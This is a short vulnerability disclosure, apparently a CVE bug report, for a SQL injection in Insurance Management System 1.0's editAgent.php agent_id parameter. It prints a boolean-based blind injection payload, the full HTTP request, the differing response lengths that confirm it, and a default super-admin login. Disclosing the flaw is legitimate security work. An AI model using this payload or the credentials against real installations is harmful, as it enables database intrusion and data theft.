Headline
CVE-2022-30001: bug_report/SQLi-3.md at main · k0xx11/bug_report
Insurance Management System 1.0 is vulnerable to SQL Injection via /insurance/editAgent.php?agent_id=.
Insurance Management System v1.0 by oretnom23 has SQL injection
Author: k0xx
vendors: https://itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/
Login account: ahmed/12345 (Super Admin account)
Vulnerability File: /insurance/editAgent.php?agent_id=
Vulnerability location: /insurance/editAgent.php?agent_id=,agent_id
[+] Payload: /insurance/editAgent.php?agent_id=1610%27%20and%20length(database())%20=4%20–+ // Leak place —> agent_id
Current database name: lims,length is 4
GET /insurance/editAgent.php?agent_id=1610%27%20and%20length(database())%20=4%20–+ HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=tmbv0mt5ff9hphhe0mtv4sghfq Connection: close
When length (database ()) = 3, Content-Length: 4385
When length (database ()) = 4, Content-Length: 4893